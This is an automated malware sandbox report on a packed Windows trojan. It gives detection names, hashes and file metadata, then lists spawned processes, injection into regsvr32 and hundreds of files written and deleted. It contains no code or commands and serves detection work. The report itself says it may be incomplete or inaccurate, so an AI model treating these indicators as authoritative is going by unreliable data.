HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.17186758 (B) (Emsisoft), Trojan.Generic.17186758 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5dcbad8bc9a8b07f5e97ca8089faaf22
SHA1: f3a340a7fad115b588ff4fe251beabf676df9f99
SHA256: 544a2a05509fe78736847e64700ee78907d3abe49428a26261c476addc4cf29b
SSDeep: 12288:1QHlW7lerECtu4aLgbqu6khVc0qI7oe3gPxWNpUcocscxFZwh:1QQperrOUj6k7ZqC30VFMlwh
Size: 813923 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-22 07:01:48
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:312
PSSetupNativeUtils.exe:3556
mofcomp.exe:3924
wscript.exe:1992
WindowsXP-KB968930-x86-ENG.exe:2764
ngen.exe:2472
ngen.exe:2904
ngen.exe:2456
ngen.exe:2564
ngen.exe:3000
ngen.exe:2960
ngen.exe:1816
ngen.exe:2520
ngen.exe:2484
ngen.exe:2980
ngen.exe:2348
ngen.exe:3020
ngen.exe:2500
ngen.exe:2444
ngen.exe:2580
ngen.exe:224
ngen.exe:784
ngen.exe:2992
ngen.exe:2492
ngen.exe:2412
ngen.exe:2372
ngen.exe:2532
ngen.exe:2512
update.exe:2828
mscorsvw.exe:2656
mscorsvw.exe:1088
mscorsvw.exe:3536
mscorsvw.exe:3068
mscorsvw.exe:2320
mscorsvw.exe:524
mscorsvw.exe:2152
mscorsvw.exe:420
mscorsvw.exe:2408
mscorsvw.exe:2360
mscorsvw.exe:2580
mscorsvw.exe:3072
mscorsvw.exe:3724
mscorsvw.exe:3644
mscorsvw.exe:3720
mscorsvw.exe:2516
mscorsvw.exe:3204
mscorsvw.exe:3784
mscorsvw.exe:3396
mscorsvw.exe:3224
mscorsvw.exe:3036
mscorsvw.exe:2896
mscorsvw.exe:1768
mscorsvw.exe:2008
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:1096
PSCustomSetupUtil.exe:2824
PSCustomSetupUtil.exe:4024
PSCustomSetupUtil.exe:252
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:796
PSCustomSetupUtil.exe:4064
PSCustomSetupUtil.exe:320
PSCustomSetupUtil.exe:2648
PSCustomSetupUtil.exe:4092
PSCustomSetupUtil.exe:584
PSCustomSetupUtil.exe:2708
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2568
PSCustomSetupUtil.exe:2608
PSCustomSetupUtil.exe:2696
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:1992
PSCustomSetupUtil.exe:1540
PSCustomSetupUtil.exe:1288
PSCustomSetupUtil.exe:2756
PSCustomSetupUtil.exe:3964
PSCustomSetupUtil.exe:3988
PSCustomSetupUtil.exe:648
PSCustomSetupUtil.exe:2008
UUPPHBZOfNIWNOEBZBhdR.exe:1076
regsvr32.exe:2380
regsvr32.exe:1752
wsmanhttpconfig.exe:3892
wsmanhttpconfig.exe:3828
The Trojan injects its code into the following process(es):
regsvr32.exe:2024
regsvr32.exe:324
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (4077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (13304 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (0 bytes)
The process PSSetupNativeUtils.exe:3556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process mofcomp.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
The process ngen.exe:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1088 bytes)
The process ngen.exe:2904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (470 bytes)
The process ngen.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)
The process ngen.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)
The process ngen.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1412 bytes)
The process ngen.exe:2960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1168 bytes)
The process ngen.exe:1816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:2520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (784 bytes)
The process ngen.exe:2484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1098 bytes)
The process ngen.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (768 bytes)
The process ngen.exe:2348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:3020 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (730 bytes)
The process ngen.exe:2500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (754 bytes)
The process ngen.exe:2444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1178 bytes)
The process ngen.exe:2580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (810 bytes)
The process ngen.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (864 bytes)
The process ngen.exe:784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (762 bytes)
The process ngen.exe:2992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1090 bytes)
The process ngen.exe:2492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1434 bytes)
The process ngen.exe:2412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)
The process ngen.exe:2372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)
The process ngen.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1124 bytes)
The process ngen.exe:2512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (452 bytes)
The process update.exe:2828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5302 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (137010 bytes)
%WinDir%\comsetup.log (49590 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242961 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
The Trojan deletes the following file(s):
%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
